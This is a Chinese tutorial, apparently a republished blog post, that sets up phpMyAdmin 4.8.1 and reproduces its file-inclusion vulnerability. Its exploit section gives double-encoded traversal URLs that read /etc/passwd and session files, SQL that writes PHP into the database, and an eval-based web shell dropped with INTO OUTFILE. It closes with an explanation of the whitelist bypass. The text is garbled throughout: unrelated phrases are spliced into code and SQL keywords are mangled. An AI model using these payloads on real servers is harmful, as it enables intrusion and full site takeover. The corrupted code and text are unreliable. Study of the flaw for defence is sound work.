首页 > 作文

phpmyadmin怎么打开命令行窗口(phpmyadmin使用教程)

更新时间:2023-04-05 23:50:25 阅读: 评论:0

一.phpmyadmin环境配置

ps:前面两部分内容会简单讲解phpmyadmin 4.8.1版本配置过程,如果读者只想了解漏洞,可以从第三部分开始阅读。还请见谅~

phpmyadmin是一种mysql数据库的管理工具,安装该工具后,即可通过web形式直接管理mysql数据,而不需要通过执行系统命令来管理,非常适合对数据库操作命令不熟悉的数据库管理者,下面详细说明该工具的安装方法。

第一步,下载phpmyadmin 4.8.1。

第二步,配置环境。
打开libraries目录下的config.default.php文件,依次找到下面各项,按照说明配置即可。

修改mysql的用户名和密码,phpmyadmin使用mysql默认用户名root,密码设置为“123456”。

/** * mysql ur * * @global string $cfg['rvers'][$i]['ur'] */$cfg['rvers'][$i]['ur'] = 'root';/** * mysql password (only needed with 'config' auth_type) * * @global string $cfg['rvers'][$i]['password'] */$cfg['rvers'][$i]['password'] = '123456';

认证方法设置为“cookie”,登录phpmyadmin时需要用户名和密码进行验证。在此有cookie、http、signon、config四种模式可供选择。

/** * authentication method (valid choices: config, http, signon or cookie) * * @global福州郊游 string $cfg['rvers'][$i]['auth_type'] */$cfg['rvers'][$i]['auth_type'] = 'cookie';

第三步,运行wamp软件,并将wamp中phpmyadmin替换成4.8.1版本。

替换如下图所示:

运行apache和mysql如下图所示。

问题1: 当我们输入用户名“root”、密码“123456”时,很可能会报错“mysqli_real_connect(): (hy000/1045): access denied for ur ‘root’@‘localhost’ (using password: yes)”。提示是错误1045,告诉我们错误是由于没有访问权限,所以访问被拒绝了,主要原因就是由于该用户名所对应的密码错误。

第四步,检查配置文件中的主机、用户名和密码,并确认这些信息与 mysql 服务器管理员所给出的信息一致。设置controlur和controlpass。

/** * mysql control ur ttings (this ur must have read-only * access to the "mysql/ur" and "mys生活中的感动ql/db" tables). the controlur is also * ud for all relational features (pmadb) * * @global string $cfg['rvers'][$i]['controlur'] 机电学*/$cfg['rvers'][$i]['controlur'] = 'root';/** * mysql control ur ttings (this ur must have read-only * access to the "mysql/ur" and "mysql/db" tables). the controlur is also * ud for all relational features (pmadb) * * @global string $cfg['rvers'][$i]['controlpass'] */$cfg['rvers'][$i]['controlpass'] = '123456';

第五步,修改“config.sample.inc.php”(或config.inc.php)文件内容。

设置controlur和controlpass值。

修改如下:

$cfg['rvers'][$i]['controlur'] = 'root';$cfg['rvers'][$i]['controlpass'] = '123456';$cfg['rvers'][$i]['ur'] = 'root';$cfg['rvers'][$i]['password'] = '123456';

第六步,接着登录phpmyadmin,输入“root”和“123456”之后进入数据库管理主界面。

二.phpmyadmin基础用法

接着我们使用phpmyadmin搭建一个简单的网站试试。

第一步,创建数据库。

第二步,创建数据表 student,点击执行。

歌曲我们好好爱第三步,设置表的字段,包括:id、urname、password。

第四步,查看我们创建好的数据表student。

第五步,插入数据并查询。

inrt into `student`(`id`, `urname`, `password`) values ('1', 'yangxiuzhang','6666666');inrt into `student`(`id`, `urname`, `password`) values ('2', 'eastmountain','123456');

此时数据显示如下图所示:

第六步,编写php代码将我们数据库中的内容显示出来。

访问地址:
http://localhost:8088/20200110.php

<?phpecho('<h2>数据库测试</h2>');//链接数据库$con = mysqli_connect("localhost", "root", "123456", "eastmount"); if (!$con) { die('could not connect databa: ' . mysqli_error()); } //设置查询结果编码$con->t_chart('utf8'); //查询学生信息$sql = "lect * from `student` ";//得到查询结果$result = $con->query($sql);  //遍历结果while($row = $result->fetch_array()){ list($id,$urname, $password) = $row;echo $id.' ';echo $urname.' ';echo $password;echo '<br >';} //关闭连接$con->clo(); ?>

显示结果如下图所示:

如果需要查看配置信息,这使用“phpinfo()”函数实现。

<?phpphpinfo();?>

显示结果如下图所示,php的配置信息。

写到这里,我们的环境已经搭建成功,接下来我们开始讲解phpmyadmin漏洞吧。可能很多博友会疑惑,为什么前面花费这么多时间讲解环境搭建了,两个原因吧!一方面作者是从零开始学习,通过环境搭建来复现该漏洞;另一方面照顾初学者,希望通过通俗易懂的步骤能实现文章的实验,也希望安全圈的大牛们别笑,哈哈~都是一点一滴成长起来的。

三.phpmyadmin漏洞复现

原因:phpmyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。

第一步,根据该版本cve漏洞构造url,在index.php后添加内容,如显示/etc/passwd详细内容。

/* 方法一 */http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd/* 方法二 */http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../../windows/date.ini

第二步,通过目录穿越包含任意文件。

第三步,执行sql语句查询数据库路径。结果为:c:xamppmysqldata。

show global variables like "%datadir%";

第四步,向数据库写入php代码。创建数据库rce和表rce,并插入php代码。

create databa rce;u rce;create table rce(code varchar(100));inrt into rce(code) values("<?php phpinfo(); ?>");

输出结果如下图所示:

然后我们可以看到插入的php代码,如下所示。

第五步,在sql中执行lect ‘<?php phpinfo() ?>’,然后查看当前页面cookie中的phpmyadmin的值。

通过浏览器查看网络的cookie值。

第六步,构建包含ssion值的url路径。
f12查看网站ssion值,访问/index.php?target=db_sql.php%253f/…/…/…/…/…/…/tmp/ss_[ssion]。

?target=db_datadict.php%253f/../../../../../../../../../phpstudy/phptutorial/tmp/tmp/ss_imnnv91q886sfboa2sqos02b7njvho24

访问能显示如下图所示的信息:

第七步,在phpinfo默认页面找到网站的安装位置:/var/www/html,然后写入一句话木马。

lect '<?php @eval($_post[hcl]) ?>' into outfile '/var/www/html/hcl.php'

第八步,通过菜刀连接 http://ip/hcl.php。菜刀连接成功,在根目录下找到了key.txt文件,查看key.txt文件,获得key值。

简单总结:

利用phpmyadmin 4.8.1后台文件包含漏洞,获取登录phpmyadmin系统所产生的ss_ssionid文件,然后通过文件绕过获取相关信息并植入木马,最终获取webshell。通常linux系统中存放路径为/tmp/ss_[当前会话ssion值]。

四.漏洞原理

在phpmyadmin 4.8.1版本的index.php文件中,第50-63行代码如下:

$target_blacklist = array (    'import.php', 'export.php');// if we have a valid target, let's load that script insteadif (! empty($_request['target'])    && is_string($_request['target'])    && ! preg_match('/^index/', $_request['target'])    && ! in_array($_request['target'], $target_blacklist)    && core::checkpagevalidity($_request['target'])) {    include $_request['target'];    exit;}

它的含义是:

target传入不能为空

target必须是一个字符串

target不能以index开头

target不能在数组target_blacklist中

target经过checkpagevalidit检查后为真

前面三个大家都容易理解,第四个判断是黑名单判断。在index.php中已经定义好了target_blacklist的值,它们是import.php和export.php,只要不等于这两个值就可以。

再看第五个判断,core::checkpagevalidity($_request[‘target’]为真,通过全局搜索发现了代码在librariesclasscore.php文件的第443-476行。

public static function checkpagevalidity(&$page, array $whitelist = []){    if (empty($whitelist)) {        $whitelist = lf::$goto_whitelist;    }    if (! ist($page) || !is_string($page)) {        return fal;    }    if (in_array($page, $whitelist)) {        return true;    }    $_page = mb_substr(        $page,        0,        mb_strpos($page . '?', '?')    );    if (in_array($_page, $whitelist)) {        return true;    }    $_page = urldecode($page);    $_page = mb_substr(        $_page,        0,        mb_strpos($_page . '?', '?')    );    if (in_array($_page, $whitelist)) {        return true;    }    return fal;}

在checkpagevalidit中有两个形参,第一个是传入的target,第二个whitelist则有默认形参,也就是空的数组。进入函数首先会判断whitelist是否为空,如果为空则将定义的goto_whitelist赋值给whitelist(因为确实为空,我们只传进去一个target)。接着我们来看看goto_whitelist的代码。

经典作文素材public static $goto_whitelist = array(        'db_datadict.php',        'db_sql.php',        'db_events.php',        'db_export.php',        'db_importdocsql.php',        'db_multi_table_query.php',        'db_structure.php',        'db_import.php',        'db_operations.php',        'db_arch.php',        'db_routines.php',        'export.php',        'import.php',        'index.php',        'pdf_pages.php',        'pdf_schema.php',        'rver_binlog.php',        'rver_collations.php',        'rver_databas.php',        'rver_engines.php',        'rver_export.php',        'rver_import.php',        'rver_privileges.php',        'rver_sql.php',        'rver_status.php',        'rver_status_advisor.php',        'rver_status_monitor.php',        'rver_status_queries.php',        'rver_status_variables.php',        'rver_variables.php',        'sql.php',        'tbl_addfield.php',        'tbl_change.php',        'tbl_create.php',        'tbl_import.php',        'tbl_indexes.php',        'tbl_sql.php',        'tbl_export.php',        'tbl_operations.php',        'tbl_structure.php',        'tbl_relation.php',        'tbl_replace.php',        'tbl_row_action.php',        'tbl_lect.php',        'tbl_zoom_lect.php',        'transformation_overview.php',        'transformation_wrapper.php',        'ur_password.php',);

接着分析代码,如果page在白名单中就会直接return true,但这里考虑到了可能带参数的情况,所以有了下面的判断。

下图的代码中,mb_strpos函数是查找string在另一个string中首次出现的位置。_page变量是获取page问号前的内容,是考虑到target有参数的情况,只要_page在白名单中就直接return true。但还考虑了url编码的情况,所以如果这步判断未成功,下一步又进行url解码。

当传入二次编码后的内容,会让checkpagevalidity()这个函数返回true,但index中实际包含的内容却不是白名单中的文件。

例如:传入“?target=db_datadict.php%253f ”,由于服务器会自动解码一次,所以在checkpagevalidity()中,page的值一开始会是“db_datadict.php%3f”,又一次url解码后变成了“db_datadict.php?”,这时符合了?前内容在白名单的要求,函数返回true。

但在index.php中_request[‘target’]仍然是“db_datadict.php%3f”,而且会被include,通过目录穿越,就可造成任意文件包含。最终通过该漏洞实现了上述攻击,这个漏洞也很快被修复并发布新版本。

五.总结

写到这里,这篇基础性文章就此结束,希望文章对您有所帮助。本文利用phpmyadmin 4.8.1后台文件包含漏洞,获取登录phpmyadmin系统所产生的ss_ssionid文件,然后通过文件绕过获取相关信息并植入木马,最终获取webshell。同时,此漏洞是登陆后才可以使用的,比较鸡肋。一般登陆后直接执行sql语句生成shell即可,但有时目录权限比较严格,不能在web目录内生成,则可以结合本例使用。

本文发布于:2023-04-05 23:50:06,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/6aa45307f56e9294660afcd4a38f6a65.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:phpmyadmin怎么打开命令行窗口(phpmyadmin使用教程).doc

本文 PDF 下载地址:phpmyadmin怎么打开命令行窗口(phpmyadmin使用教程).pdf

标签:文件   漏洞   所示   代码
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图